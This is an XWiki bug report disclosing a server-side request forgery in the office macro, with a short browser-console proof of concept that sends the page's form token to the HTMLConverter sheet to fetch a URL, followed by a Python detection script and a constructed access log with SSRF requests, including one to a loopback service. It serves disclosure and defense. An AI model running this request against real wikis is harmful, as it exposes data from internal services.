Details
- Type: Bug
- Resolution: Solved By
- Priority: Blocker
- Version: 14.10
- Unknown
- N/A
- N/A
Description
Steps to reproduce:
- Make sure the office server is running.
- As guest (or any user with view right) go to the main page of the wiki.
- Run the following in the browser's console:
(function (text) {
  // Build a request to the CKEditor HTMLConverter sheet of the current page
  const url = new URL(document.location);
  url.searchParams.append('sheet', 'CKEditor.HTMLConverter');
  // Pass the page's form token so the request satisfies the CSRF check
  url.searchParams.append('formToken', document.documentElement.dataset.xwikiFormToken);
  url.searchParams.append('toHTML', 'true');
  // The wiki syntax to render: an office macro with a url: reference
  url.searchParams.append('text', text);
  document.location = url;
})('{{office reference="url:https://example.com/index.html"/}}');
Expected result:
An error is displayed.
Actual result:
The content of https://example.com/index.html is displayed without styling. This demonstrates a server-side request forgery (SSRF) that can be used to expose data from internal services that are only accessible from the host. There seem to be limits on what content is displayed; in particular, the URL seems to need an ending that resembles a file name. Apart from that, it also seems to display different errors depending on whether the URL returns an error or not.
This can be exploited from any wiki page, in comments, or via the HTMLConverter as demonstrated above.
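Defender's view of the report above: an added detection example (not part of the issue or of XWiki's code) that finds office macros with a url: reference both in stored wiki content (pages, comments) and in HTMLConverter rendering requests pulled from access-log lines, and classifies each fetch target as internal or external. The log lines and the field names are constructed for the example; hostnames are not resolved, so a public-looking name that resolves internally would still be classified as external.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# {{office reference="url:<target>" .../}} in XWiki syntax; single or double quotes.
OFFICE_URL_REF = re.compile(r'\{\{office\b[^}]*?\breference\s*=\s*(["\'])url:(.*?)\1', re.I | re.S)
# Request line inside a common-log-format access log entry.
LOG_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def find_office_url_refs(text):
    """Return every URL targeted by an office macro with a url: reference."""
    return [m.group(2) for m in OFFICE_URL_REF.finditer(text)]

def classify_target(url):
    """'internal' for loopback/private/link-local IPs or dot-less names, else 'external'.
    Nothing is resolved, so this runs offline; a hostname may still resolve internally."""
    host = urlsplit(url).hostname
    if not host:
        return "unknown"
    try:
        return "internal" if not ipaddress.ip_address(host).is_global else "external"
    except ValueError:
        return "internal" if "." not in host else "external"

def scan_html_converter_request(request_uri):
    """Flag office url: references rendered through the HTMLConverter sheet (the report's path)."""
    params = parse_qs(urlsplit(request_uri).query)  # parse_qs percent-decodes the text param
    if params.get("sheet") != ["CKEditor.HTMLConverter"] or params.get("toHTML") != ["true"]:
        return []
    return [{"target": t, "class": classify_target(t)}
            for text in params.get("text", []) for t in find_office_url_refs(text)]

def scan_access_log(lines):
    """Run the request check over access-log lines, recording the 1-based line number."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_REQUEST.search(line)
        for f in (scan_html_converter_request(m.group(1)) if m else []):
            findings.append({"line": lineno, **f})
    return findings

# Constructed sample log: a plain render, a fetch of a loopback service, and an external fetch.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Mar/2023:10:00:00 +0000] "GET /bin/view/Main/?sheet=CKEditor.HTMLConverter&toHTML=true&formToken=abc&text=%3D%3D%20Title%20%3D%3D HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Mar/2023:10:00:01 +0000] "GET /bin/view/Main/?sheet=CKEditor.HTMLConverter&toHTML=true&formToken=abc&text=%7B%7Boffice%20reference%3D%22url%3Ahttp%3A%2F%2F127.0.0.1%3A8080%2Fstatus.html%22%2F%7D%7D HTTP/1.1" 200 2048',
    '10.0.0.5 - - [01/Mar/2023:10:00:02 +0000] "GET /bin/view/Main/?sheet=CKEditor.HTMLConverter&toHTML=true&formToken=abc&text=%7B%7Boffice%20reference%3D%22url%3Ahttps%3A%2F%2Fexample.com%2Findex.html%22%2F%7D%7D HTTP/1.1" 200 1024',
]
```

Running `scan_access_log(SAMPLE_LOG)` flags lines 2 (internal) and 3 (external) and ignores the benign render; `find_office_url_refs` alone can be run over page source and comments to find stored instances.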
Issue Links
- is related to XWIKI-20447 Office document viewer macro allows anyone to see any file from host (Closed)